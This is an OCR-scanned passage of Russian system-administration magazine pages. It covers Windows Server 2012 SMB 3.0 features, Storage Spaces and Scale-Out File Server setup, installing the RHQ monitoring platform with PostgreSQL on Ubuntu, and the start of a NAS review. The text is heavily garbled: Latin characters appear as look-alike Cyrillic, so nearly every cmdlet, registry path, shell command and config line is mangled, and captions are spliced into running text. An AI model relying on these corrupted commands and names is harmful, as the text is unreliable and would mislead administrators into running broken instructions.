беІ-ЗтЬШпеззСІіепІ: 

Р5> Се1:-5тЫлІі1:пе55С1іеп1:_1 Беіесі: С1іеп1:І\Іате, \ 

Рі1еБегѵегМосІеМате.,ІлІі1:пе55І\ІосІеІ\Іате 

По умолчанию БМВ ѴѴіІпезз трафик между сервером и клиентом 
требует проверки подлинности и подписывается, но не шифруется. 
Чтобы зашифровать его, следует добавить ОѴѴОРО ключ реестра со 
значением 0x00000001 на каждом клиенте: 

>5е1=-І1=етРгорег1:ѵ -Раіііі "НК1М:\5У5ТЕМ\Сиггеп1=Соп1=по15е1=\ \ 
БегѵісезМаптапЫогкБІіаІііопХРагатеІіепБ" ЫіііпеББРІа^Б 
-Ѵаіие 1 -Рогсе 
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5УЫ/АСК 



И, чтобы сервер принимал только зашифрованные сообщения, 
создаем в реестре йѴѴОРО со значением 0x00000001: 

Р5 > Бе/б- 1 іет Р горе гііу - Рабб "НКЕУ_ЮСАІ_МАСНІМЕ\$у5І:ет\ \ 
СипгепІіСопІіпоІБеІіХБегѵісевХБМВІлІіІіпеввХРагатеІіегв" 
Р1а§5 -Ѵаіие 1 -Рогсе 

Клиенты 5МВ версии до 3.0 смогут получить доступ к 50Р5- 
ресурсам, однако функция 5МВ Тгапзрагепі Раііоѵег и служба БМВ 
ѴѴіІпезз будут для них недоступны. 

5МВ йІРЕСТ 

Среди основных требований, предъявляемых к хранилищам дан- 
ных, — низкие задержки и быстрая передача данных. Чтобы им со- 
ответствовать, 5МВ 3.0 поддерживает РОМА-совместимые сетевые 
адаптеры, позволяющие серьезно увеличить скорость передачи 
данных и производительность приложений при малой загрузке 
СРІІ (напомню, РОМА — Ретоіе йігесі Метогу Асеева, стандарт 
передачи данных между приложениями, при котором приложения 
передают данные напрямую из памяти в обход процессора). Со- 
ответствующая функция получила название БМВ йігесС или БМВ 
оѵег РОМА. В ѴѴіп2012 поддерживаются все три известные РОМА- 
технологии: ІпНпіВапсІ, Іпіегпеі ѴѴісІе Агеа РОМАРгоІосоІ (ІѴѴАРР) 
и РОМА оѵег СопѵегдесІ Еібегпеі (РоСЕ). Отказоустойчивый кластер 
может использовать несколько сетей для клиентского доступа че- 
рез РОМА сетевые адаптеры. Но чтобы технология работала, РОМА 
должен поддерживаться как сервером, так и клиентом. Выручает 
то, что такие сетевые адаптеры автоматически обнаруживаются 
системой и не требуют каких-либо дополнительных настроек со 
стороны администратора. 

Поддержка РОМА включается командой: 

Р5> беб-ІМебАсІарбег 

Р5> ЕпаЫе-ІМебАсІарІіегКсІта имя 

Чтобы получить текущие установки, запускаем Сеі- 
ЫеіАсІарІегРсІта. 

Для глобального изменения настройки РОМА всех адаптеров 
сразу следует использовать командлет БеІ-МеШНІоасІСІоЬаІБеиіпд: 

Р5> 5еб-№бОбЛоа(іеіоЬа15е1:1:іп§ - ІМебілюгкРігесІ: ЕпаЫесІ 




Соответственно, указав ОізаЫе-ЫеіАсІарІегРсІта или -ЫеІѵѵогкОігесІ 
ОізаЫе, мы отключим РОМА в случае необходимости. 

5МВМІЛ_ТІСНАММЕІ_ 

Функция БМВ МиШсЬаппеІ позволяет увеличить пропускную 
способность сети и повысить отказоустойчивость за счет одно- 
временного использования нескольких сетевых адаптеров. Все 
установленные сетевые карты обнаруживаются и БМВ МиШсЬаппеІ 
активируется автоматически, никаких дополнительных настроек 
не требуется. Без БМВ МиШсбаппеІ по умолчанию для одной сессии 
создается одно ТСР/ІР-соединение, даже в случае объединения 
карт при помощи N10 Театіпд. Но если сетевая карта поддержива- 
ет функцию Р55 (Ресеіѵе Бісіе Бсаііпд), позволяющую распределять 
подключения по ядрам процессора, БМВ МиШсЬаппеІ может созда- 
вать несколько ТСР/ІР-подключений для одной БМВ-сессии даже 
для одной сетевой карты. В установках по умолчанию количество 
ТСР/ІР-подключений на сетевой адаптер для разных типов от- 
личается. Так, для Р55 оно равно четырем, для РОМА — двум и для 
обычных сетевух — одному. Изменять эти значения не рекомен- 
дуется, но если в этом есть необходимость, используй командлет 
БеІ-БтЬСІіепіСопЛдигаІіоп. 

При установке соединения между клиентом и сервером опреде- 
ляются все сетевые карты, которые могут быть использованы для 
обмена данными, и производится их систематизация по типу. Одно- 
типные адаптеры объединяются в группу и используются вместе. 
Чем большую пропускную способность обеспечивает адаптер, 
тем выше его приоритет. В случае появления или удаления сетевой 
карты производится пересчет приоритета. И если, например, 
в системе появилась более производительная карта, все соедине- 
ния автоматически будут перекинуты на нее. Вручную ограничить 



ТЕХНОЛОГИЯ 5Т0КА6Е БРАСЕ5: ЧТО ЭТО? 



В ѴѴіп2012 технология виртуализации 
добралась и до устройств хранения. Новая 
функция Біогаде Брасез позволяет объединить 
несколько дисков в один логический, упрощая 
администрирование и обеспечивая защиту от 
потерь информации. Накопители объединяются 
в пулы (рооі), а пулы разбиваются на 
пространства (зрасе), которые форматируются 
как обычные файловые системы и выглядят 
как обыкновенный диск. В дальнейшем в зрасе 
можно создавать разделы и работать с ними, 
как обычно. В свое время в ѴѴіпсІоѵѵз Ноте 
Бегѵег 2011 была предложена система Огіѵе 
Ехіепсіег, так вот Біогаде Брасез обходит ее по 
всем параметрам. 

При создании зрасе задается политика 
резервирования: зітріе (в случае 
использования одного диска), зеркалирование 



(тіггогесі, на двух дисках), тождественность 
(рагііу, несколько дисков, как в ВАШ 
5). В случае выхода из строя одного из 
устройств информация будет восстановлена. 
Но в отличие от ВАШ, Біогаде Брасез 
может объединять устройства с разными 
интерфейсами — БАТА, 5С5І, БАБ или 115В, 
а сами диски могут быть разного объема. При 
этом логический размер создаваемого пула 
может быть больше размера всех физических 
носителей (Пііп ргоѵізіопіпд), по мере 
заполнения пользователь просто добавляет 
новый диск, без каких-либо дополнительных 
настроек. Возможна интеграция с С5Ѵ 
(Сіизіег Ббагесі Ѵоіитез) и отказоустойчивым 
кластером. С точки зрения приложения или 
пользователя пул выглядит как обычный 
диск (приложения не видят реальных дисков. 



только виртуальные). Но есть и ограничения: 
так, пул не может быть загрузочным, а диск 
подключаться к другому пулу. 

Новый диск автоматически попадает 
в первый пул (РгітогсііаІ Рооі), откуда его уже 
подключают к нужному. Права назначаются 
на уровне пулов, поддерживается интеграция 
с Асііѵе Оігесіогу. Управлять пулами можно 
в диспетчере сервера (в разделе «Файловые 
службы и службы хранилища») или при помощи 
командлетов РоѵѵегБбеІІ (*-5іогадеРооІ, 
*-ѴИиаШізк, *-РбузісаШізк). Достаточно во 
вкладке «Пул носителей» выбрать диск и из 
контекстного меню запустить мастер создания 
пула хранения. В процессе предстоитуказать 
имя пула и отобрать диски. В ѴѴіп8 Біогаде Бра- 
сез создаются через оснастку Біогаде Брасег 
(Сопігоі РапеІ — > Бузіепп апсі Бесигііу). 
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Кладовая данных 




Функция Біогаде Брасез позволяет объединять несколько дисков в один логический 

число используемых адаптеров можно при помощи командлета 
Меѵѵ-БтЬМиІіісбаппеІСопзігаіпі. 

Функция БМВ МиІіісЬаппеІ по умолчанию активирована, для 
управления на стороне сервера/клиента используются командле- 
ты 5еі-5тЬ5егѵегСопіідигаііоп и Беі-БтЬСІіепіСопіідигаііоп. Чтобы 
вручную включить БМВ МиІіісЬаппеІ на сервере, достаточно ввести 
команду: 

Р5> 5е1:-5тЬ5егѵегСопб§ига1:іоп -ЕпаЬ1еМи11:іСііаппе]^$1:гие 
А на клиенте: 

Р5> 5е1:-5тЬС1іеп1:Сопб^ига1:іоп -ЕпаЬІеМиІІііСІіаппеІ $1:гие 



УСТАНОВКА 50Р5 



Введение новой роли кластера не усложнило администрирование, 
даже наоборот, в новом интерфейсе настройки заметно упрощены. 
Перед началом развертывания роли следует все системы кластера 
включить в домен, иначе ряд установок будет недоступен. Чтобы 
добавить 50Р5, следует выбрать роль «Файловый сервер» (Рііе 
Бегѵег), которая находится в блоке «Службы файлов и хранилищ» 
(Рііе апсі Біогаде Бегѵісез), затем на следующем шаге «Компо- 
ненты» отметить «Отказоустойчивая кластеризация» (Раііоѵег 




Виртуальный диск Біогаде Брасез по размеру может быть больше физического 




Настройка структуры хранилища Біогаде Брасез 

СІизіегіпд) и подтвердить установку. Те же действия можно выпол- 
нить средствами РоѵѵегБЬеІІ: 

Р5> АсІсІ-ІлІіпсІомзРеаІіиге -пате Рі1е-5егѵісез,Раі1оѵег-С1из1:егіп§ \ 
-Іпс1исІеМапа§етеп1:ТооІ5 

Повторяем операцию на других узлах. Далее необходимо добавить 
СІизіег БбагесІ Ѵоіите. Выбираем в меню «Средства» (Тооіз) пункт 
«Диспетчер отказоустойчивости кластеров» (Раііоѵег СІизіег Мападег) 
и создаем кластер, нажав одноименную ссылку. Появится мастер, 
в котором нужно указать серверы и точку доступа для администриро- 
вания кластера. В созданном кластере переходим в меню «Храни- 
лище — > Диски» и добавляем диск, а затем и С5Ѵ — «АсІсІ іо СІизіег 
БЬагесІ Ѵоіитез». Все, кластер создан. Добавляем роль кластера при 
помощи «Настроить роль» (Сопіідиге Роіе), появляется очередной 
мастер, в котором отмечаем «Рііе Бегѵег» и на следующем шаге «Рііе 
Бегѵег Туре» выбираем один из двух вариантов: 

• файловый сервер для общего пользования (Рііе Бегѵег іог 
депегаі изе) — привычный с ранних версий отказоустойчивый 
кластер, в котором все ресурсы ассоциируются только с одним 
сервером, поддерживается подключение по протоколам БМВ 

и І\ІР5, а также дедупликация данных, йБР-репликация и управ- 
ление при помощи диспетчера ресурсов файлового сервера 
(Рііе Бегѵег Резоигсе Мападег); 

• масштабируемый файловый сервер для данных приложений 
(Рііе Бегѵег іог зсаіе-оиі арріісаііоп баіа) — кластер нового типа, 
используемый для приложений и виртуальных машин, которые 
оставляют файлы долгое время открытыми, клиент одновре- 
менно обращается к любому из узлов. І\ІР5, дедупликация, 05РР 
и Р5РМ не поддерживаются. 

Нас интересует второй тип файлового сервера, отмечаем его, 
указываем І\ІЕТВІ05-имя для доступа к кластеру и подтверждаем 
установку. При помощи РоѵѵегБЬеІІ процедура выглядит проще: 

Р5> АсІсІ-С1и5І:ег5са1еОи1:Рі1е5егѵегКо1е \ 

-ІМате 0із1:гіЬи1:е(Ме1:могкІ\Іате -С1из1:ег С1из1:егІ\Іате 

Теперь осталось добавить сетевые папки, выбрав в мастере 
наиболее подходящий тип «Общий ресурс БМВ — > Профиль при- 
ложений» (БМВ БЬаге — > Бегѵег Арріісаііопз), и установить права 
доступа. Например, в случае использования Нурег-Ѵ необходимо 
разрешить доступ к папке учетной записи 5У5ТЕМ и всем адми- 
нистраторам Нурег-Ѵ. С этого момента при создании виртуальных 
машин и баз данных можно указывать наш сетевой ресурс высокой 
доступности. □С 
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ЯНО: ПЛАТФОРМА 
ЦЕНТРАЛИЗОВАННОГО 
УПРАВЛЕНИЯ 
СИСТЕМАМИ В СЕТИ 
ПРЕДПРИЯТИЯ 

Нередко в ведении сисадмина находится 
несколько десятков сервисов, разбросанных 
по разным серверам. Пытаться отслеживать 
их состояние и управлять всем вручную — 
заранее проигранная битва. Требуется 
универсальный инструмент, способный работать 
в гетерогенной среде, и здесь может выручить 
РНО — открытая платформа централизованного 
управления, инвентаризации, мониторинга 
и конфигурирования систем. 



ВОЗМОЖНОСТИ РНО 



РНО ( іЬозз.огд/гбд ) позволяет контролировать работу различных 
дистрибутивов І_іпііх и ОС ѴѴіпсІоѵѵз, веб-серверов АрасЬе и 115, 
контейнеров АрасЬе Тотсаі, серверных служб АрасЬе Саззапсіга, 
ЛЗозз, РозІдгеЗОЦ Огасіе, Му50І_, РозНчх, 5атЬа, СоЬЫег, 55Н, 
загрузчика 6РІІВ и другого. Модульный принцип построения 
предусматривает возможность управления практически любы- 
ми параметрами работы операционной системы и приложений. 

Для мониторинга удаленных систем используются агенты, которые 
автоматически обнаруживаются сервером сразу после установки. 
Безопасность обмена данными между сервером и агентами обе- 
спечивается за счет организации соединений по протоколу ТІ_5 
и применения сертификатов Х.509. Компоненты РНО написаны 
на ^ѵа, поэтому агенты будут работать на любой платформе, где 
функционирует ^Е. Для настройки и отображения собранной ин- 
формации используется веб-интерфейс, базирующийся на фрейм- 
ворке ЗтагЮѴѴТ и технологии А)ах. 

РНО позволяет настраивать ресурсы (под этим термином по- 
нимаются приложения и сервисы), в частности править конфигу- 
рационные файлы РозІдге50І_, Му50І_, ЛЗозз, АрасЬе. Поддер- 
живается контроль версий, поэтому, если новый релиз работает 
не так, как предполагалось, или кто-то из коллег-админов 
что-то сломал, есть возможность быстро откатиться к старым 
настройкам. Чтобы управлять большим количеством объектов 
было проще, все ресурсы инвентаризируют и разделяют на типы 
и категории (платформа, ОС и сервис). С помощью этих групп 
строится иерархия ресурсов и описание зависимостей. При 
необходимости администратор может отобрать список, напри- 
мер, всех приложений, работающих на определенном сервере, 
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Сетевой управдом 




Настройка подключения к БД в мастере установки 



Интерфейс РНО ОазЬЬоагсІ полностью настраиваемый 



или все однотипные приложения со всех ОС. Сами объекты вруч- 
ную распределяются по группам (например, по территориаль- 
ному принципу], им присваиваются теги. Таким образом очень 
легко отобрать приложения по некоторому критерию для даль- 
нейшей настройки или анализа. 

При помощи плагинов реализовываются отдельные операции 
по работе сервиса, например запуск и останов службы. Конкрет- 
ный список операций определяется плагином, и потому даже 
для разных версий одного и того же приложения они часто от- 
личаются. Выбранное действие можно выполнить сразу, по рас- 
писанию, указав повторение. Чтобы получить список доступных 
операций, достаточно просто выбрать объект в интерфейсе 
управления. После того как команда подана, она отправляется 
в планировщик, который через менеджер управления отдает ко- 
манду агенту на исполнение и контролирует состояние. Резуль- 
тат сохраняется и в последующем может быть использован для 
анализа. Установленный агент собирает все связанные события, 
которые затем отправляются на сервер, где они могут быть про- 
смотрены и отобраны с помощью фильтров. Консолидированная 
информация позволяет составить картину происходящего и 
при необходимости получать данные за любой период. Произ- 
водится корреляция и анализ событий, на основе полученных 
данных строятся оповещения (Аіегіз). Различаются связанные 
события, группировка однотипных событий и необходимость 
участия администратора в решении одного или нескольких со- 
бытий. Администратор может самостоятельно задавать условия 
для активации оповещения, например наличие свободного 
места на разделе жесткого диска в абсолютном, относительном 
или процентном значении, с учетом конкретной платформы или 
группы (название/версия ОС, дистрибутив, архитектура и тому 
подобное). В настоящее время поддерживается уведомление 
администратора по электронной почте. Возможен экспорт от- 
четов в С5Ѵ-файл. РНО способен распространять указанные 
администратором файлы на удаленные системы, после загруз- 
ки они распаковываются агентом. К примеру, таким образом 
можно быстро обновить сайт или установить Іаѵа-приложение. 
Поддерживается установка приложений при помощи пакетного 
менеджера ѴІІМ и ІАР-файлов. 

Помимо мониторинга, РНО может собирать данные по каждому 
веб-запросу и измерять время отклика веб-приложения, по- 
зволяя определить, какие ІІРІ_ обрабатываются быстрее, а какие 
с задержкой. Собранные данные выводятся в виде таблицы или 
наглядной диаграммы. 

Несколько серверов РНО могут совместно работать в кластере. 
Ролевая система доступа позволяет назначить действительно 
необходимые права вплоть до отдельного ресурса. Для аутенти- 



фикации используется внутренняя база данных пользователей, 
возможна синхронизация с ЮАР. Для хранения накопленной 
информации по умолчанию ставится встроенная СУБД Н2, которую 
рекомендуется использовать лишь в тестовой среде. В реальных 
условиях следует подключить внешнюю БД — РозІдгеБСИ, Огасіе 
или М5 5СІІ_. 



УСТАНОВКА РНО 



Сервер и агент РНО могут быть установлены на любых платформах, 
поддерживающих Заѵа 6. Официально поддерживаются х86/х64/ 
іа64 І_іпих или ѴѴіпсіоѵѵб. Все 64-битные ОС, за исключением І_іпих, 
должны работать в режиме 32-битной совместимости. В качестве 
Ыпих-дистрибутива предпочтительно использовать СепШБ/РесІога 
(поскольку РНО поддерживает только ѴІІМ), хотя система отлично 
работает на ІІЬипІи, йеЫап, еіс. Далее разберем установку РНО 4.4 
(май 2012) на ІІЬипІи 12.04 І_Т5, хотя вся информация по установке 
будет актуальной и для других дистрибутивов с учетом особенно- 
стей их пакетной базы. 

Для установки и работы РНО требуется 1РЕ6 или ЮК6, поддер- 
живается любая из доступных библиотек: ОрепЮК, 5ип Іаѵа или 
ЗРоскіІ, кроме 6ІЧІІ I і Ь д с і . При самостоятельной сборке потребуется 
также Маѵеп 2.2.1+ (он есть в репозитории). 

$ біісіо ар1:-§е1: іпБІаІІ орепдсік-б-дсік роБІ^геБЦІ 

После установки РозІдгеБОБ следует поправить механизм 
аутентификации: 

$ 5іісіо папо /еІс/роБІ^еБдІ/Э Л/таіп/р§_ИЬа.соп-Р 
Іосаі а 11 аіі ІігиБІ: 

Нов* а 11 а 11 127.0.0.1/32 *ги5* 

и оптимизировать производительность СУБД во избежание под- 
тормаживаний: 



$ біісіо папо /е1с/ро5Ізге5д1/9.1/таіп/ро5І:§ге5д1.соп-Р 

1І5І:еп_асІсІге55е5 = 1 * ' 

5ІіагесІ_Ьи-р-Рег5 = 80МВ 
иогк^тет = 2Ѳ48 
Б'Ьа'Ьетеп'ЮЬітеоиІ: = 305 
сбескроіп1:_5е§теп1:5 ^10 

# В процессе работы КНР использует около 55 подключений 

# к БД. плюс часть нужно зарезервировать для админа(ов^) 
БцрегиБеп геБегѵесІ соппѳсіііопб = 5 
щах_соппес1:іоп5 = 60 
тах_ргерагесІ_1:гап5ас1:іоп5 = 60 
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5УЫ/АСК 




Все объекты в консоли управления РИО удобно группируются 

Перезапускаем сервер и создаем учетную запись и базу данных: 

$ біісіо зегѵісе розі^гезді гезііагі: 

$ зисіо зепѵісе розі^гезді іпііісіЬ 
$ сгеаііеизеп -Іі 127.0.0.1 -р 5432 -I) розіі^пез \ 

-5 -Р -К гбдасітіп 

$ сгеа1:есІЬ -Іі 127.0.0.1 -р 5432 -II розі^гез \ 

-О гбдасітіп гіід 

Скачиваем архив с исходными текстами по ссылке с сайта про- 
екта и распаковываем: 

$ зисіо ипгір гЕд-зегѵег-4.4.0. гір -сі /ор* 

$ ссі /ор1:/гІід-5егѵег-4.4.0/Ьіп 

Чтобы сервер нашел исполняемый файл, перед его запуском 
следует установить переменную РЕЮ_5ЕРѴЕР_1АѴА_ЕІ0МЕ или 
РЕЮ_5ЕРѴЕР_1АѴА_ЕХЕ_РІІ_Е_РАТЕІ в файле гЬд-зегѵег.зЬ. Там 
же устанавливаем РН0_5ЕРѴЕР_Н0МЕ, указывающую на рабочий 
каталог сервера: 

$ зисіо папо гМд-зегѵег.зІі 

КНО_5ЕКѴЕК_НОМЕ=/ор1:/гІія-5егѵег-4.4.0 

дАѴАН0МЕ=/и5г/1іЬ/д'ѵт/даѵа-6-орепдсІк-атсІ64 

В других параметрах скрипта гЬд-зегѵег.зЬ можно указать 
специфические переменные для запуска виртуальной машины 
Іаѵа и сервера РЕЮ, установить отладку и так далее. 

Некоторые установки производятся в файлах гЬд-зегѵег. 
ргорегііез и гЬд-зегѵег.зесигіІу-роІісу. Так, в гЬд-зегѵег.ргорегІіез 
прописывается подключение к БД, работа в НА-кластере, номера 
портов для подключения, работа с плагинами, автоустановка 
сервера. В непосредственной правке этих конфигов нет необхо- 
димости, большую часть параметров можно будет изменить в окне 
программы установки. Запускаем сервер командой: 

$ зисіо . /гіід-зегѵег. зіі г^агЕ 

Набираем в браузере Ьир://ІосаПіозІ:7080/ и следуем указаниям 
мастера установки. Во втором окне получаем три группы параме- 
тров, главный из которых— настройка подключения к БД. При вы- 
боре нужной СУБД в списке «ОаІаЬазе Туре» будут автоматически 
заполнены все поля для подключения на локальной системе. Сразу 
же следует проверить соединение, нажав кнопку «Тез* Соппесііоп». 
Остальные настройки пока оставляем как есть. 

Мониторинг сервера РЕЮ можно производить при помощи 
внешнего агента (разворачивается обычным способом, как от- 
дельное приложение) или встроенного в сервер. Встроенный агент 
активируется установкой параметра «ЕтЬесИесІ Адепі ЕпаЫесІ» 
в значение «Уез» или соответствующими опциями в конфигураци- 



онном файле (группа «ЕтЬебсІесІ РЕЮ АдепЫ, но рекомендуется 
использовать именно внешний. При необходимости болеетонкую 
настройку сервера производят после активации флажка «БЬоѵѵ 
АбѵапсесІ БеШпдз». Чтобы в последующем изменить установки, до- 
статочно отредактировать файл гЬд-зегѵег.ргорегІіез или восполь- 
зоваться консолью управления. При развертывании нескольких 
серверов можно заранее создать шаблон, который затем копиро- 
вать на каждый из узлов. При установленных в «аиіо» параметрах 
гіід.аиіоіпзіаіі.* весь процесс будет происходить автоматически. 
ЕІажимаем кнопку «ІпзІаІІ Бегѵег!» и ждем окончания процесса. 

Для входа в консоль управления используем логин и пароль 
гбдасітіп. Интерфейс управления РЕЮ состоит из нескольких 
вкладок. После регистрации пользователь попадает в информаци- 
онную панель ЮазЬЬоагсІ), в которой собрано несколько вкладок, 
отображающих основные события. Панель полностью настраи- 
ваемая: можно создать несколько ОазЬЬоагсІ, добавить новые 
портлеты, отвечающие за вывод специфической информации, 
или изменить число колонок. Важные сообщения выводятся чуть 
ниже, под меню, и выделяются красным или зеленым цветом. 



УСТАНОВКА АГЕНТОВ 



Теперь можно приступать к развертыванию агентов. Сначала 
по ссылке Ьир://гЬд-зегѵег:7080/адепІирсІаІе/сІоѵѵпІоасІ сохраняем 
ІАР-файл и устанавливаем: 

$ зисіо даѵа -да г гІід-еп1:егргІ5е-а§еп1:-4.4.0. дат X 

--іпз1:а11=/ор1:/гІід-а§еп1: 

$ зисіо /ор1=/пІід-а^еп1=/пІід-а^еп1=/Ьіп/гІід-а^еп1=. зіі 

При запуске агент задаст несколько вопросов (имя, ІР и порт 
агента и сервера), при необходимости впоследствии их можно 
изменить в файле сопіѴадепІ-сопічдигаІіоп.хтІ или непосред- 
ственно в веб-консоли РЕЮ. Для входящих запросов на клиенте 
по умолчанию используется порт 16163. В процессе установки агент 
подключится к серверу, получит настройки и доступные плагины. 
За процессом можно следить в консоли, по окончании будет до- 
ступна консоль управления. 



НАСТРОЙКИ МОНИТОРИНГА 



После установки агента все системы автоматически появятся 
в меню «Іпѵепіогу — > Аиіо йізсоѵегу Оиеие». ЕІажав плюс, можно 
просмотреть список запущенных приложений, их тип и статус 
(после добавления все имеют статус «ІЧеѵѵ»). Чтобы не мониторить 
работу некоторых служб (например, сгоп или ззИ), следует выбрать 
«лишние» и нажать «Ідпоге». Для активации отмечаем и нажимаем 
кнопку «Ітрогі». После чего данные будут доступны в подменю АП 
Резоигсез, РІаПюгтз, Бегѵегз, Бегѵісез и ІІпаѵаіІаЫе Бегѵегз. Та- 
блицы с информацией полностью настраиваемые, можно добавить 
или убрать столбцы, указать сортировку объектов. Чтобы получить 
полные данные по сервису, просто нажимаем на соответствую- 




При помощи РНО можноуправлять сервисами 
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Сетевой управдом 




Система ролей позволяет делегировать права нескольким администраторам 

щую ссылку. Текущий статус показывается при помощи флажка 
в правом верхнем углу. Зеленый означает доступность ресурса 
и его настроек. Все свойства объектов собраны в нескольких 
вкладках, назначение которых очевидно из названий — Биттагу, 
Іпѵепіогу, Аіегіз, Мопііогіпд, Еѵепіз, Орегаііопз, СопПдигаІіоп. Часть 
операций с выбранным объектом (настройка ресурсов, конфигура- 
ция и другие] производится при помощи контекстного меню. 

Предусмотрено использование тегов и групп, позволяющих ад- 
министратору самостоятельно группировать сервисы или системы. 
Тег можно задать при выборе соответствующего объекта. Группы 
создаются в отдельном подменю «бгоирз». Просто нажимаем кноп- 
ку «Ыеѵѵ», указываем название и отбираем объекты, которые будут 
в нее входить, при необходимости пользуемся готовыми фильтра- 
ми. Все события отправляются в меню «Рерогіз», здесь найдем все 
теги, изменения конфигураций, оповещения, а также собранную 
информацию о платформах и инвентаризации. РНО производит 
анализ и выводит в удобном виде данные конфигурации, а также 
историю в подменю «СопЯдигаІіоп». Например, для сгоп все за- 
дания разбиты по периодичности: час, день, неделя и месяц. Там, 
где возможно, применены переключатели, позволяющие сразу 
выбрать готовую настройку. В подменю «Орегаііопз» показыва- 
ются и создаются действия. По умолчанию список пуст, нажимаем 
кнопку «ІМеѵѵ» и заполняем параметры. Все действия, доступные 
для выбранного объекта, отображаются в выпадающем списке 




Возможности РНО легко изменить при помощи плагинов 

«Орегаііопз». Просто выбираем нужное и в случае доступности 
вводим дополнительные параметры в открывшейся ниже строке. 
Можно задать время исполнения, задержку и повторяемость. 

Все операции по распространению файлов на удаленных систе- 
мах производятся в панели «ВипсІІе» при помощи понятного ма- 
стера. В качестве параметра указывается файл, который вручную 
загружается с локальной системы или удаленного ресурса. После 
загрузки пакет будет показан в окне «ВипсІІе», где при нажатии 
кнопки «йеріоу» можно начать его распространение. 

Вкладка «Асітіпізігаііоп» состоит из четырех подразделов. 

В «Бесигііу» создаются учетные записи и указываются роли. После 
установки в системе присутствуют две роли — администратор и 
пользователь с доступом ко всем ресурсам без возможности адми- 
нистрирования сервера РНО. При необходимости можно создать 
любое количество ролей с заданными правами. В подменю «Тороіоду» 
отображается вся топология сети — серверы, агенты, группы, со- 
бытия. Все настройки сервера, шаблонов и плагинов находятся в 
«Сопбдигаііоп», а в «Сопіепі» создаются доступные источники файлов 
(удаленный ІІРІ_, НТТР через прокси, локальный дисковый или ѴІІМ). 



ЗАКЛЮЧЕНИЕ 



РНО — весьма полезное кроссплатформенное решение, позволяю- 
щее администратору управлять сетевой инфраструктурой и быть 
в курсе всех событий, происходящих на подчиненных серверах. ПС 



НАИБОЛЕЕ ИНТЕРЕСНЫЕ ПАРАМЕТРЫ ФАЙЛА 
АСЕЫТ-С0ЫРІ6УРАТЮМ.ХМЕ 



гЬд.адепІ.сопНдигаІіоп-зеІир-Над — 

установка значения в «Ітие» заставит агента 
запускаться без вопросов; 
гЬд.адепІ.пате — полное РСШІМ имя агента, 
при установке будет получено автоматически; 

гЬд.адепІ.зегѵег.ЬіпсІ-асІсІгезз и гЬд.адепІ. 
зегѵег.ЬіпсІ-рогІ — адрес и порт сервера, 
к которому должен подключаться агент; 
гЬд.соттипісаІіопз.соппесІог.* — набор 
настроек для входящих запросов на клиенте, 
по умолчанию используется порт 16163; 
гЬд.адепІ.зегѵег-аиІо-сІеІесІіоп — при 



значении «*гие» агент автоматически 
пытается найти ближайший РНО-сервер 
и определить его состояние. Если сервер 
не найден, переходит в автономный режим; 

гЬд.адепІ.гедізІег-ѵѵііЬ-зегѵег-аі-зІагІир — 

автоматическая регистрация агента при 
загрузке, лучше оставить «*гие», иначе 
придется делать это вручную; 

гЬд.соттипісаІіопз.соппесІог.зеси- 
гііу.* и гЬд.адепІ.сІіепІ.зесигіІу.* — набор 
параметров для организации защищенного 
соединения. 



ІШП 

Сервер РНО способен 
работать в системах 
высокой доступности 
(НідНАѵаіІаЬіІііуСІизІег). 

Интерфейс РНО 
локализован, хотя и не 
на 100%. Посмотреть 
статус работ по 
переводу можно на 
страничке діНіиЬ.сот/ 
гНд-ргоіесі/ігап5Іаііоп5 . 

Как правило, плагины 
представляют собой 
.МР-файлы, которые 
можно распаковать 
для изучения 
внутренностей. 

В последнем 
релизе добавилась 
возможность для 
использования так 
называемых .МР-Іе55 
плагинов. 



ѴѴАКЫШС 



Для корректной 
работы РНО время 
на всех серверах 
в сети должно быть 
синхронизировано 
при помощи ИТР. 

* Сайт проекта РНО: 

|Ьо55.ога/гЬд: 

• перевод 
интерфейса РНО: 

діНіиЬ.сот/гНд-ргоі- 

есіЛгапаІаііопа . 
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ГЕМШМ 



Сергей Плотников 





ТЕСТИРОВАНИЕ ДВУХДИСКОВЫХ ИА5 



И з-за катаклизмов, произошедших 
в Таиланде в прошлом году, произ- 
водители ЫА5 наверняка ощутили 
на себе все тяготы невероятного подорожания 
жестких дисков. Однако ситуация стабилизи- 
ровалась, и винчестеры с каждым днем де- 
шевеют. Следовательно, мы не видим причин, 
чтобы отказать себе в удовольствии приоб- 
рести какой-нибудь ЫАБ-сервер. Сегодня мы 
рассмотрим двухдисковые сетевые хранили- 
ща данных. 

ЭВОЛЮЦИЯ 

Все рассматриваемые решения можно раз- 
делить на две группы. Более бюджетные 
и менее мощные построены на АРМ-решениях 
от МагѵеІІ, самые мощные варианты исполь- 
зуют процессоры семейства КігкѵѵоосІ. Другая 
группа — более продвинутая и дорогая — по- 
строена на процессорах Іпіеі Аіот. Вне конку- 
ренции по-прежнему двухъядерный Іпіеі Аіот 
0525, представленный два года назад. Этот 
процессор поддерживает технологию Нурег- 
ТЬгеасІіпд и может использовать память стан- 
дарта 00Р2 и ОйРЗ в обычном форм-факторе 
5СЮІММ. Благодаря последнему обстоятель- 
ству ЫАБ'ы на базе данной платформы легко 
поддаются апгрейду, в них можно установить 
до 4 Гб ОЗУ. 



УДЕЛ ТЕХНОМАНЬЯКА 

Логичный вопрос: а почему бы не собрать 
сервер самому? Тем более что десктопные 
платформы дают куда больше пространства 
для маневров. Благодаря специальной про- 
шивке РгееЫАБ ( Ітеепаз.огд ) такие решения 
могут оказаться достаточно функциональны- 
ми, гибкими и доступными по цене. Однако 
сила готового решения заключается в том, 
что производитель тщательно подгоняет 
друг под друга аппаратную и программную 
составляющую, — поэтому у таких решений 
более удобный и продуманный интерфейс. 

Да и не все функции фирменных прошивок 
удастся реализовать самостоятельно. 

МЕТОДИКА ТЕСТИРОВАНИЯ 

Для измерения производительности ЫА5 
мы использовали уже проверенный временем 
бенчмарк Іпіеі ЫА5 Регіюгтапсе Тооікіі (Іпіеі 
ЫА5РТ). Он способен нагрузить сетевое хра- 
нилище имитацией задач разной сложности: 
от банального копирования файлов и папок 
на сетевой диск до потокового воспроизведе- 
ния и записи РШ-видео. Для того чтобы узнать 
максимальную производительность двухди- 
сковых серверов, мы установили винчестеры 
в режим РАЮО. А вот массив РАЮ1, в свою 
очередь, продемонстрировал нам, насколько 



• Ц-Ыпк 0Ы5-325 

• ИЕТ6ЕАП РЫ02000-200ЕЦ5 

• МЕТ6ЕАК РМОР2000-Ю0ЕІІ5 

• ОМАРТигЬо ИАБ Т5-219РІІ 

• ОЫАРТигЬо ИАБ ТБ-259 Рго+ 

• ТІіеси5М2200ХХХ 

ІЖШЯІіНШМ 

